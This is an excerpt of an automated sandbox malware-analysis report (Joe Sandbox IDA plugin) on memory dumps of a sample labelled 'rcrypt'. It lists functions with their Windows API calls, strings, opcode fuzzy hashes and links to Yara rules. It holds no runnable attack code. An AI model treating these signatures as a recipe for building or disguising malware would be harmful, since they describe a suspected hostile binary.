Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: 8bd1e1f04a8fadc6062eb663ba8d362ed4b021dbf558187662392b7135846cc6
Instruction ID: eaa71a718ff3e4efb995a35c35244d6aee92299ec4398fdc194ec4aebffbb44e
Opcode Fuzzy Hash: 8bd1e1f04a8fadc6062eb663ba8d362ed4b021dbf558187662392b7135846cc6
Instruction Fuzzy Hash: 1E21B374D40208BFDF05AB64CCC5EFFBB78EF59300F10411ABA11971A2DB75999A9A20

Function 00149645 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00149651
GetClassNameW.USER32(00000000,?,00000100), ref: 00149666
_wcscmp.LIBCMT ref: 00149678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001496F3

Strings

SHELLDLL_DefView, xrefs: 00149672
@U=u, xrefs: 001496F3
smallicons, xrefs: 001496BB
details, xrefs: 001496A1
list, xrefs: 001496D5
largeicons, xrefs: 00149687

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
Instruction ID: 7ce473a81698f941058402589847d5e595055e89eeb12eb1ea484432ffa319d5
Opcode Fuzzy Hash: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
Instruction Fuzzy Hash: E7114C7A648307BAFA092620DC0BDE7779CDB16770F210137F910A50F5FFA169D14A58

Function 00117040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0011707B

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

__gmtime64_s.LIBCMT ref: 00117114
__gmtime64_s.LIBCMT ref: 0011714A
__gmtime64_s.LIBCMT ref: 00117167
__allrem.LIBCMT ref: 001171BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001171D9
__allrem.LIBCMT ref: 001171F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0011720E
__allrem.LIBCMT ref: 00117225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00117243
__invoke_watson.LIBCMT ref: 001172B4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: a78846058ed66f5dddb1fbc31b447e55e48021b8cee290ce0e8e53d778d925d0
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 1E71F871A04716ABD718AE79DC41BEAB3B8AF25320F14423AF814D73C1E770D9918B90

Function 00152A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00152A31
GetMenuItemInfoW.USER32(001B6890,000000FF,00000000,00000030), ref: 00152A92
SetMenuItemInfoW.USER32(001B6890,00000004,00000000,00000030), ref: 00152AC8
Sleep.KERNEL32(000001F4), ref: 00152ADA
GetMenuItemCount.USER32(?), ref: 00152B1E
GetMenuItemID.USER32(?,00000000), ref: 00152B3A
GetMenuItemID.USER32(?,-00000001), ref: 00152B64
GetMenuItemID.USER32(?,?), ref: 00152BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00152BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C24

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 1f6a43f4e6a83699fa757a829c748a977206e38f7102faba845410c3d4da0846
Instruction ID: 02d9d91262610d052cbeb0f6fd34525f97d494bb7423ded58c9afdb73acbd554
Opcode Fuzzy Hash: 1f6a43f4e6a83699fa757a829c748a977206e38f7102faba845410c3d4da0846
Instruction Fuzzy Hash: 3C6190B2900249EFDB11CF64D888EAE7BB8EB12306F140559FC619B251D731AD8ADB21

Function 00177192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00177214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00177217
GetWindowLongW.USER32(?,000000F0), ref: 0017723B
_memset.LIBCMT ref: 0017724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0017725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001772D6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 9c244378d556f5ad74ccd17d520ac94ae5a76e9dec9634b2e6909f1bef1f928e
Instruction ID: e527fb8b1df4feb65f35355af3e6bf252fc4e128ad51d802347d3627703aa570
Opcode Fuzzy Hash: 9c244378d556f5ad74ccd17d520ac94ae5a76e9dec9634b2e6909f1bef1f928e
Instruction Fuzzy Hash: B0615875A00208AFDB10DFA4CC81EEE77F8EB09710F144169FA18A72E1D774AE45DBA0

Function 0014710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00147135
SafeArrayAllocData.OLEAUT32(?), ref: 0014718E
VariantInit.OLEAUT32(?), ref: 001471A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 001471C0
VariantCopy.OLEAUT32(?,?), ref: 00147213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00147227
VariantClear.OLEAUT32(?), ref: 0014723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00147249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00147252
VariantClear.OLEAUT32(?), ref: 00147264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0014726F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: de8e1c64cce730bc1cb37ed0e94e4bb814c3888e5cdf601ed74ee63ef1d49ece
Instruction ID: 09d73faea83106404c987308be2b54a9a9522da40d5662662c658652240b03d0
Opcode Fuzzy Hash: de8e1c64cce730bc1cb37ed0e94e4bb814c3888e5cdf601ed74ee63ef1d49ece
Instruction Fuzzy Hash: 78415135A04119AFCF14DF64D848DEEBBB9FF08354F008069F916A7661CB70A986CF90

Function 0017D74C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

GetSystemMetrics.USER32(0000000F), ref: 0017D78A
GetSystemMetrics.USER32(0000000F), ref: 0017D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0017D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0017DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0017DA24
ShowWindow.USER32(00000003,00000000), ref: 0017DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0017DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 0017DA8B

Strings

@U=u, xrefs: 0017DA03, 0017DA24

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID: @U=u
API String ID: 1211466189-2594219639
Opcode ID: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
Instruction ID: dcffead6069332d8d414f26a1dcd68252c05546e95d491cb80c0855c4b89780b
Opcode Fuzzy Hash: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
Instruction Fuzzy Hash: BCB19971600219EBDF18CF68D985BAD7BB1BF48710F09C069ED889B295D734A990CB50

Function 001686D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

CoInitialize.OLE32 ref: 00168718
CoUninitialize.OLE32 ref: 00168723
CoCreateInstance.OLE32(?,00000000,00000017,00182BEC,?), ref: 00168783
IIDFromString.OLE32(?,?), ref: 001687F6
VariantInit.OLEAUT32(?), ref: 00168890
VariantClear.OLEAUT32(?), ref: 001688F1

Strings

Invalid parameter, xrefs: 0016880F
Failed to create object, xrefs: 0016878E, 00168844
NULL Pointer assignment, xrefs: 001687C8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 1e43d7a0eb4223e9241e62b7aa0d434008aa1d5e2de6494ee736becd13a697bf
Instruction ID: 6a3ed775b2fa3118cea15379565cf7ab6402a6c4f393c2c7473c7d0511ab30cc
Opcode Fuzzy Hash: 1e43d7a0eb4223e9241e62b7aa0d434008aa1d5e2de6494ee736becd13a697bf
Instruction Fuzzy Hash: CD61CF716083019FD714DF24CC89B6BBBE8AF49714F104A1DF9859B291CB70ED98CBA2

Function 000F2E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 000F2EAE

Part of subcall function 000F1DB3: GetClientRect.USER32(?,?), ref: 000F1DDC
Part of subcall function 000F1DB3: GetWindowRect.USER32(?,?), ref: 000F1E1D
Part of subcall function 000F1DB3: ScreenToClient.USER32(?,?), ref: 000F1E45

GetDC.USER32 ref: 0012CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0012CF95
SelectObject.GDI32(00000000,00000000), ref: 0012CFA3
SelectObject.GDI32(00000000,00000000), ref: 0012CFB8
ReleaseDC.USER32(?,00000000), ref: 0012CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0012D04B

Strings

U, xrefs: 0012CF20
@U=u, xrefs: 0012CF95

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
Instruction ID: b2e45d9e22c43cb5217ce1504a356cccf026f0031b2b7123a6247bda9a680f9a
Opcode Fuzzy Hash: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
Instruction Fuzzy Hash: 9571C531500209DFCF258F64E984AFE7BB5FF49350F244269FE559A1A6C7318C91DBA0

Function 00165A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00165AA6
inet_addr.WSOCK32(?,?,?), ref: 00165AEB
gethostbyname.WSOCK32(?), ref: 00165AF7
IcmpCreateFile.IPHLPAPI ref: 00165B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00165C00
WSACleanup.WSOCK32 ref: 00165C06

Strings

Ping, xrefs: 00165B29

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d913bd178a85df18240c845e79a7c4936dc4bd8bfc2ae0f82999e4e65ae368f9
Instruction ID: 488fa89a68b66a88019572c069d498245f5db759b6e0ad765a1b739601a6bb2c
Opcode Fuzzy Hash: d913bd178a85df18240c845e79a7c4936dc4bd8bfc2ae0f82999e4e65ae368f9
Instruction Fuzzy Hash: C651A031604B019FD720EF24CC49B6ABBE6EF48710F148929F65ADB2A1DB70E850DB52

Function 0017C27C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0017C2E4
ImageList_EndDrag.COMCTL32 ref: 0017C2EA
ReleaseCapture.USER32 ref: 0017C2F0
SetWindowTextW.USER32(?,00000000), ref: 0017C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0017C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0017C48F

Strings

@GUI_DRAGFILE, xrefs: 0017C424
@U=u, xrefs: 0017C3AD
@GUI_DROPID, xrefs: 0017C3E1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: 4a612439dac9f6736f5ebeff8251de887ed88670d7739952e6c458acd10d5728
Instruction ID: 71cd32c06c1abb80e834f5d1e8d1ff97a49134799be981ede0c40ca878925539
Opcode Fuzzy Hash: 4a612439dac9f6736f5ebeff8251de887ed88670d7739952e6c458acd10d5728
Instruction Fuzzy Hash: 63519D70204304AFD704DF24C895FAA7BF5FB98310F00862DF6598B2A2CB349999DB52

Function 0015B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0015B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0015B7B1
GetLastError.KERNEL32 ref: 0015B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0015B828

Strings

READY, xrefs: 0015B801
READONLY, xrefs: 0015B7F3
INVALID, xrefs: 0015B7FA
NOTREADY, xrefs: 0015B7E7
UNKNOWN, xrefs: 0015B7E0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 11ed14f217b8d3b5f266aab04c97ced2d46d73307bbfe03c7047466dbc23b964
Instruction ID: bbce7c493157ffdb99771afb4244ec4bed8c79fedfcf3e033e0f69294b30f63c
Opcode Fuzzy Hash: 11ed14f217b8d3b5f266aab04c97ced2d46d73307bbfe03c7047466dbc23b964
Instruction Fuzzy Hash: 9331A135A04208DFCB04EF64CCC5ABE77B4EF49702F144029E9259B2D2DB71994AC751

Function 00176442 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0017645A
GetDC.USER32(00000000), ref: 00176462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017646D
ReleaseDC.USER32(00000000,00000000), ref: 00176479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001764B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001764C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00179299,?,?,000000FF,00000000,?,000000FF,?), ref: 00176500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00176520

Strings

@U=u, xrefs: 001764C6, 00176520

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
Instruction ID: 926be2e1d918155ef9b7134084d4c3b1524b6f379eccf7105dbe0c8f19642aec
Opcode Fuzzy Hash: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
Instruction Fuzzy Hash: 6F315C76201614AFEB118F50CC8AFEB3BA9EB09761F044069FE089A291D7759C82CB64

Function 00168BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00168BEC
CoInitialize.OLE32(00000000), ref: 00168C19
CoUninitialize.OLE32 ref: 00168C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00168D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00168E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00182C0C), ref: 00168E84
CoGetObject.OLE32(?,00000000,00182C0C,?), ref: 00168EA7
SetErrorMode.KERNEL32(00000000), ref: 00168EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00168F3A
VariantClear.OLEAUT32(?), ref: 00168F4A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
Instruction ID: b60ac559921c74945d173abb7af540ccbef8a8f07ef592a990e3c7c77747be90
Opcode Fuzzy Hash: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
Instruction Fuzzy Hash: B0C12671208305AFC700DF64C88496BB7E9FF89748F104A6DF58A9B251DB71ED46CB62

Function 00154189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0015419D
__swprintf.LIBCMT ref: 001541AA

Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931

FindResourceW.KERNEL32(?,?,0000000E), ref: 001541D4
LoadResource.KERNEL32(?,00000000), ref: 001541E0
LockResource.KERNEL32(00000000), ref: 001541ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0015420D
LoadResource.KERNEL32(?,00000000), ref: 0015421F
SizeofResource.KERNEL32(?,00000000), ref: 0015422E
LockResource.KERNEL32(?), ref: 0015423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0015429B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
